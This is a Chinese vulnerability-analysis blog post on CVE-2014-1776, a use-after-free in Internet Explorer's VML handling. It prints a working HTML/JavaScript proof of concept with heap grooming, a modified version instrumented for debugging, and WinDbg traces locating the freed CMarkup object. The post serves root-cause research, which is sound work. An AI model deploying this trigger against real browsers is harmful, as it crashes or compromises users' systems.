zoukankan      html  css  js  c++  java

  • CVE-2014-1776 秘狐

    传说中的IE秘狐

    [CNNVD]Microsoft Internet Explorer 释放后重用漏洞(CNNVD-201404-530)        

    Microsoft Internet Explorer(IE)是美国微软(Microsoft)公司开发的一款Web浏览器,是Windows操作系统附带的默认浏览器。

    Microsoft IE 6至11版本的VGX.DLL文件中存在释放后重用漏洞。远程攻击者可利用该漏洞执行任意代码或造成拒绝服务(内存损坏)。

    POC:

    <html xmlns:v="urn:schemas-microsoft-com:vml">
<STYLE>
v:* { Behavior: url(#default#VML) }
</STYLE>
<head id="l">
<title></title>
<script>
    function trigger()
    {
        var r,t,e,i;
        var o = document.getElementById("l");
        r = document.createElement("i");
        t = r;
        r = document.getElementById("k").childNodes[0].appendChild(r) ;
        r = t.appendChild(o) ;
        e = r.offsetParent;
        e.onpropertychange=fun;
        i=o.firstChild.nextSibling;
        try
        {
            i.disabled = o;
        }
        catch (e) {}
    }
    function fun() 
    {
        var g_arr = [];
        var arrLen = 0x250;
        var m_block;
 
        for (var i = 0; i < arrLen; ++i) 
        {
            g_arr[i] = document.createElement('div');
        }
        var a = unescape("%uAAAA%uAAAA") ;  
        while (a.length < 0xd8) 
        {
            a += unescape("%uBBBB%uBBBB") ;
        }
        m_block = a.substring(0, (0xd8 - 2) / 2);
        try 
        {
            this.removeNode(true);
        } 
        catch (e) {}
        CollectGarbage();
        for (var i = 0; i < (arrLen / 2); ++i) 
        {
            g_arr[i].title = m_block ;
        }
    }
</script>
</head>
<body>
<v:group id="k" style="500pt;">
    <div></div> 
</group>
<script>
trigger() ;
</script>
</body>
</html>

    经分析得出是CMarkup对象发生的UAF

    这个样本的确可以成功触发漏洞,但是这个明显是一个经过设计exp。exp的行为会干扰到我们对漏洞产生原因的分析。

    重利用

    1:021> kv
ChildEBP RetAddr  Args to Child              
041ee998 68318a98 087abfc0 6837ce50 00000000 mshtml!CMarkup::IsConnectedToPrimaryMarkup+0x6 (FPO: [0,0,2])
041ee9b8 68319d57 06dfbf30 00000003 041ee9dc mshtml!CMarkup::OnCssChange+0x52
041ee9c8 6860a5b3 00000003 087abfc0 6837ce64 mshtml!CElement::OnCssChange+0x1e
041ee9dc 6836bfc6 8001004c 00030080 6837ce50 mshtml!CStyleElement::OnPropertyChange+0xfc
041eeabc 682e4bd1 6837ce64 ffffffff 087abfcc mshtml!NUMPROPPARAMS::SetNumberProperty+0x2d9
041eead8 682e4ba1 0000ffff 0a82efd8 041eeb10 mshtml!CBase::put_BoolHelper+0x25
041eeae8 682e24dd 087abfc0 0000ffff 068e8fd0 mshtml!CBase::put_Bool+0x22
041eeb10 683f235c 087abfc0 068e8fd0 0a82efd8 mshtml!GS_VARIANTBOOL+0x19b
041eeb84 683fc75a 087abfc0 8001004c 00000001 mshtml!CBase::ContextInvokeEx+0x5dc
041eebd4 6820c29b 087abfc0 8001004c 00000001 mshtml!CElement::ContextInvokeEx+0x9d
041eec00 683a3104 087abfc0 8001004c 00000001 mshtml!CStyleElement::VersionedInvokeEx+0x62
041eec54 645aa22a 06e9afd8 8001004c 00000001 mshtml!PlainInvokeEx+0xeb
041eec90 645aa175 0819cd10 8001004c 00000409 jscript!IDispatchExInvokeEx2+0x104
041eeccc 645aa3f6 0819cd10 00000409 0000000c jscript!IDispatchExInvokeEx+0x6a
041eed8c 645aa4a0 8001004c 0000000c 00000000 jscript!InvokeDispatchEx+0x98
041eedc0 645bd8c8 0819cd10 041eedf4 0000000c jscript!VAR::InvokeByName+0x139
041eee08 645a9c0e 0819cd10 0000000c 00000000 jscript!VAR::InvokeDispName+0x7d
041eef9c 645b5c9d 041eefb4 00000000 01876f88 jscript!CScriptRuntime::Run+0x208d
041ef084 645b5bfb 00000000 00000000 01878fa0 jscript!ScrFncObj::CallWithFrameOnStack+0xce
041ef0cc 645b74ac 00000000 00000000 01878fa0 jscript!ScrFncObj::Call+0x8d

     释放

    1:021> g
Breakpoint 0 hit
eax=683720a8 ebx=06d96fe8 ecx=06fd1f30 edx=001f1078 esi=06fd1f30 edi=00000000
eip=683e12b8 esp=0419b40c ebp=0419b414 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CMarkup::~CMarkup:
683e12b8 8bff            mov     edi,edi
1:021> ? esi
Evaluate expression: 117251888 = 06fd1f30
1:021> kv
ChildEBP RetAddr  Args to Child              
0419b408 683e1297 06fd1f30 0419b42c 68387dd0 mshtml!CMarkup::~CMarkup (FPO: [0,0,2])
0419b414 68387dd0 00000001 68387db6 00000000 mshtml!CMarkup::`scalar deleting destructor'+0xd
0419b41c 68387db6 00000000 06fd1f30 0419b450 mshtml!CBase::SubRelease+0x22 (FPO: [0,0,0])
0419b42c 68319de5 06fd1f30 0540b680 6831a2d4 mshtml!CBase::PrivateRelease+0x3c
0419b438 6831a2d4 0a978fd8 0a97efd8 00001400 mshtml!CMarkup::ProcessPeerTask+0x47 (FPO: [0,1,0])
0419b450 683fc6ce 08a4af30 00000000 0a978fd8 mshtml!CMarkup::ProcessPeerTasks+0xf0
0419b468 683f1e59 0a97efd8 07873260 10000003 mshtml!CElement::VersionedGetDispID+0x52
0419b4ac 68a3a304 0a978fd8 07873260 10000003 mshtml!PlainGetDispID+0xdc
0419b4dc 68a3a272 07873260 0419b518 0a978fd8 jscript!IDispatchExGetDispID+0xa5
0419b4f4 68a3a47a 06e25d10 0419b518 00000003 jscript!GetDex2DispID+0x31
0419b520 68a4d8c8 06e25d10 0419b554 0000000c jscript!VAR::InvokeByName+0xee
0419b56c 68a39c0e 06e25d10 0000000c 00000000 jscript!VAR::InvokeDispName+0x7d
0419b700 68a45c9d 0419b718 0419b85c 06e5bf88 jscript!CScriptRuntime::Run+0x208d
0419b7e8 68a45bfb 0419b85c 00000000 06e57e80 jscript!ScrFncObj::CallWithFrameOnStack+0xce
0419b830 68a45e11 0419b85c 00000000 06e57e80 jscript!ScrFncObj::Call+0x8d
0419b8ac 68a3f3ee 06e5bf88 0419baf0 00000000 jscript!CSession::Execute+0x15f
0419b994 68a3ea2e 00000000 00000001 0419ba4c jscript!NameTbl::InvokeDef+0x1b5
0419ba18 68417af1 06e5bf88 00000000 00000804 jscript!NameTbl::InvokeEx+0x12c
0419ba68 68417b91 063d2fc8 06e5bf88 00000000 mshtml!CBase::InvokeDispatchWithThis+0x1e1
0419bb94 6838a932 80010013 8001179f 0a96cfd8 mshtml!CBase::InvokeEvent+0x214

    分配

        70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030
    77247d96 ntdll!RtlpAllocateHeap+0x000000c4
    772134ca ntdll!RtlAllocateHeap+0x0000023a
    6830a8da mshtml!CDoc::CreateMarkupFromInfo+0x000000e2
    6831625f mshtml!CDoc::CreateMarkup+0x0000004a
    6826d0b1 mshtml!CCommentElement::`scalar deleting destructor'+0x000002d3
    681ec57d mshtml!CElement::removeNode+0x00000046
    681ec630 mshtml!Method_IDispatchpp_oDoVARIANTBOOL+0x000000cc
    683f235c mshtml!CBase::ContextInvokeEx+0x000005dc
    683fc75a mshtml!CElement::ContextInvokeEx+0x0000009d
    683fc79a mshtml!CInput::VersionedInvokeEx+0x0000002d
    683a3104 mshtml!PlainInvokeEx+0x000000eb
    67eba22a jscript!IDispatchExInvokeEx2+0x00000104
    67eba175 jscript!IDispatchExInvokeEx+0x0000006a
    67eba3f6 jscript!InvokeDispatchEx+0x00000098
    67eba4a0 jscript!VAR::InvokeByName+0x00000139
    67ecd8c8 jscript!VAR::InvokeDispName+0x0000007d
    67ecd96f jscript!VAR::InvokeByDispID+0x000000ce
    67ece3e7 jscript!CScriptRuntime::Run+0x00002b80
    67ec5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    67ec5bfb jscript!ScrFncObj::Call+0x0000008d
    67ec5e11 jscript!CSession::Execute+0x0000015f
    67ebf3ee jscript!NameTbl::InvokeDef+0x000001b5
    67ebea2e jscript!NameTbl::InvokeEx+0x0000012c
    68417af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
    68417b91 mshtml!CBase::InvokeEvent+0x00000214
    6838a932 mshtml!CBase::FireEvent+0x000000e1
    683d4836 mshtml!CElement::FireEvent+0x000003c4
    6840c550 mshtml!CElement::Fire_onpropertychange+0x0000005a
    6840c4d7 mshtml!CElement::Fire_PropertyChangeHelper+0x00000121
    6840c457 mshtml!CElement::OnPropertyChange+0x00000b7b

    分析一下流程

    修改POC,增加辅助语句

    <html xmlns:v="urn:schemas-microsoft-com:vml">
<STYLE>
v:* { Behavior: url(#default#VML) }
</STYLE>
<head id="l">
<title></title>
<script>
Math.tan(2,3);
    function trigger()
    {
        var r,t,e,i;
        var o = document.getElementById("l");
Math.sin(2,3);
        r = document.createElement("i");
Math.cos(2,3);
    t = r;
Math.tan(2,3);
        r = document.getElementById("k").childNodes[0].appendChild(r) ;
Math.sin(2,3);
        r = t.appendChild(o) ;
Math.cos(2,3);
        e = r.offsetParent;
Math.tan(2,3);
        e.onpropertychange=fun;
Math.sin(2,3);
        i=o.firstChild.nextSibling;
Math.cos(2,3);
        try
        {
        Math.tan(2,3);
            i.disabled = o;
        }
        catch (e) {}
    }
    function fun() 
    {
        var g_arr = [];
        var arrLen = 0x250;
        var m_block;
 
        for (var i = 0; i < arrLen; ++i) 
        {
            g_arr[i] = document.createElement('div');
        }
        var a = unescape("%uAAAA%uAAAA") ;  
        while (a.length < 0xd8) 
        {
            a += unescape("%uBBBB%uBBBB") ;
        }
        m_block = a.substring(0, (0xd8 - 2) / 2);
        try 
        {
Math.cos(2,3);
            this.removeNode(true);
        } 
        catch (e) {}
Math.tan(2,3);
        CollectGarbage();
        for (var i = 0; i < (arrLen / 2); ++i) 
        {
            g_arr[i].title = m_block ;
        }
    }
</script>
</head>
<body>
<v:group id="k" style="500pt;">
    <div></div> 
</group>
<script>
trigger() ;
</script>
</body>
</html> 
    1:021> g
Breakpoint 0 hit
eax=00000000 ebx=040ded00 ecx=00000005 edx=00000003 esi=040decf0 edi=040decf0
eip=688bd8c0 esp=040debf4 ebp=040dec30 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!tan:
688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
1:021> g
Breakpoint 2 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd711 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!sin:
688bd711 ff2568108968    jmp     dword ptr [jscript!_imp__sin (68891068)] ds:0023:68891068={msvcrt!sin (758d8aea)}
1:021> g
Breakpoint 1 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd67f esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!cos:
688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
1:021> g
Breakpoint 0 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!tan:
688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
1:021> g
Breakpoint 2 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd711 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!sin:
688bd711 ff2568108968    jmp     dword ptr [jscript!_imp__sin (68891068)] ds:0023:68891068={msvcrt!sin (758d8aea)}
1:021> g
Breakpoint 1 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd67f esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!cos:
688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
1:021> g
Breakpoint 0 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!tan:
688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
1:021> g
Breakpoint 1 hit
eax=00000000 ebx=040ddae0 ecx=00000005 edx=00000003 esi=040ddad0 edi=040ddad0
eip=688bd67f esp=040dd9b4 ebp=040dd9f0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!cos:
688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
1:021> g
Breakpoint 3 hit
eax=040dd934 ebx=00000001 ecx=00000000 edx=6837c8f9 esi=05741680 edi=00000000
eip=68316215 esp=040dd854 ebp=040dd938 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CDoc::CreateMarkup:
68316215 8bff            mov     edi,edi
1:021> g
Breakpoint 0 hit
eax=00000000 ebx=040ddae0 ecx=00000005 edx=00000003 esi=040ddad0 edi=040ddad0
eip=688bd8c0 esp=040dd9b4 ebp=040dd9f0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!tan:
688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
1:021> g
Breakpoint 2 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd711 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!sin:
688bd711 ff2568108968    jmp     dword ptr [jscript!_imp__sin (68891068)] ds:0023:68891068={msvcrt!sin (758d8aea)}
1:021> g
Breakpoint 1 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd67f esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!cos:
688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
1:021> g
Breakpoint 0 hit
eax=00000000 ebx=040de998 ecx=00000005 edx=00000003 esi=040de988 edi=040de988
eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!tan:
688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
1:021> g
Breakpoint 1 hit
eax=00000000 ebx=040db3a0 ecx=00000005 edx=00000003 esi=040db390 edi=040db390
eip=688bd67f esp=040db274 ebp=040db2b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!cos:
688bd67f ff2590108968    jmp     dword ptr [jscript!_imp__cos (68891090)] ds:0023:68891090={msvcrt!cos (758d8ace)}
1:021> g
Breakpoint 3 hit
eax=040db1f4 ebx=00000001 ecx=07b9ff30 edx=6837c8f9 esi=05741680 edi=00000000
eip=68316215 esp=040db114 ebp=040db1f8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CDoc::CreateMarkup:
68316215 8bff            mov     edi,edi
1:021> g
Breakpoint 0 hit
eax=00000000 ebx=040db3a0 ecx=00000005 edx=00000003 esi=040db390 edi=040db390
eip=688bd8c0 esp=040db274 ebp=040db2b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!tan:
688bd8c0 ff2580108968    jmp     dword ptr [jscript!_imp__tan (68891080)] ds:0023:68891080={msvcrt!tan (758dde34)}
1:021> g
(e68.584): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07caff30 ebx=07caff30 ecx=a06dfdb5 edx=68335438 esi=07caff30 edi=0824efc0
eip=68318d1d esp=040de6ec ebp=040de710 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CMarkup::IsConnectedToPrimaryMarkup+0x6:
68318d1d 8b465c          mov     eax,dword ptr [esi+5Ch] ds:0023:07caff8c=????????

    通过分析发现

     this.removeNode(true);

    一句的执行导致了CDoc::CreateMarkup函数创建

    CDoc::CreateMarkup其实是对CDoc::CreateMarkupFromInfo的简单封装,CDoc::CreateMarkupFromInfo方法中通过HeapAlloc函数来分配内存。

    通过此种方式获取分配的内存地址,最后发现UAF对象其实是第一个CreateMarkup函数进行分配的。

    1:020> g
Breakpoint 0 hit
eax=00000000 ebx=042bde78 ecx=00000005 edx=00000003 esi=042bde68 edi=042bde68
eip=67edd8c0 esp=042bdd74 ebp=042bddb0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!tan:
67edd8c0 ff258010eb67    jmp     dword ptr [jscript!_imp__tan (67eb1080)] ds:0023:67eb1080={msvcrt!tan (758dde34)}
1:020> bl
 0 e 67edd8c0     0001 (0001)  1:**** jscript!tan
 1 e 67edd67f     0001 (0001)  1:**** jscript!cos
 2 e 67edd711     0001 (0001)  1:**** jscript!sin
1:020> bu mshtml!CMarkup::~CMarkup
1:020> g
Breakpoint 2 hit
eax=00000000 ebx=042bed30 ecx=00000005 edx=00000003 esi=042bed20 edi=042bed20
eip=67edd711 esp=042bec34 ebp=042bec70 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!sin:
67edd711 ff256810eb67    jmp     dword ptr [jscript!_imp__sin (67eb1068)] ds:0023:67eb1068={msvcrt!sin (758d8aea)}
1:020> g
Breakpoint 1 hit
eax=00000000 ebx=042bed30 ecx=00000005 edx=00000003 esi=042bed20 edi=042bed20
eip=67edd67f esp=042bec34 ebp=042bec70 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!cos:
67edd67f ff259010eb67    jmp     dword ptr [jscript!_imp__cos (67eb1090)] ds:0023:67eb1090={msvcrt!cos (758d8ace)}
1:020> g
Breakpoint 0 hit
eax=00000000 ebx=042bb738 ecx=00000005 edx=00000003 esi=042bb728 edi=042bb728
eip=67edd8c0 esp=042bb634 ebp=042bb670 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!tan:
67edd8c0 ff258010eb67    jmp     dword ptr [jscript!_imp__tan (67eb1080)] ds:0023:67eb1080={msvcrt!tan (758dde34)}
1:020> g
Breakpoint 3 hit
eax=683720a8 ebx=0653efe8 ecx=07117f30 edx=00051078 esi=07117f30 edi=00000000
eip=683e12b8 esp=042bb7a4 ebp=042bb7ac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CMarkup::~CMarkup:
683e12b8 8bff            mov     edi,edi
1:020> ? ecx
Evaluate expression: 118587184 = 07117f30
1:020> g
(b74.e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07117f30 ebx=07117f30 ecx=9f3dcc40 edx=68335438 esi=07117f30 edi=08392fc0
eip=68318d1d esp=042bea84 ebp=042beaa8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CMarkup::IsConnectedToPrimaryMarkup+0x6:
68318d1d 8b465c          mov     eax,dword ptr [esi+5Ch] ds:0023:07117f8c=????????

    没有明显的js语句对应于释放和重用。

    对象应该是因为引用计数耗尽而被释放的。

    向上跟踪最后崩溃的位置,发现悬垂指针是处于CStyleElement+0x24的位置

    根据OnCssChange函数我猜测是当css结构变动导致的引用了CStyleElement中指向已释放的CMarkup对象的悬垂指针。
  • 相关阅读:
    自定义NHibernate映射类型
    IIS AppCreate子目录的错误(0x80020006)
    NHibernate 慎用IList
    開發記要 詭異的變量
    发布个jquery的绑定工具 jquery.bindTools 1.5
    Python学习笔记:jupyter notebook设置自动换行
    Python学习笔记:pandas透视表之pivot_table、pivot
    Python学习笔记:一道stack & pivot搞定的练习题
    Python学习笔记:描述性统计describe
    Python学习笔记:类别设置之category与set_categories
  • 原文地址:https://www.cnblogs.com/Ox9A82/p/5833842.html
Copyright © 2011-2022 走看看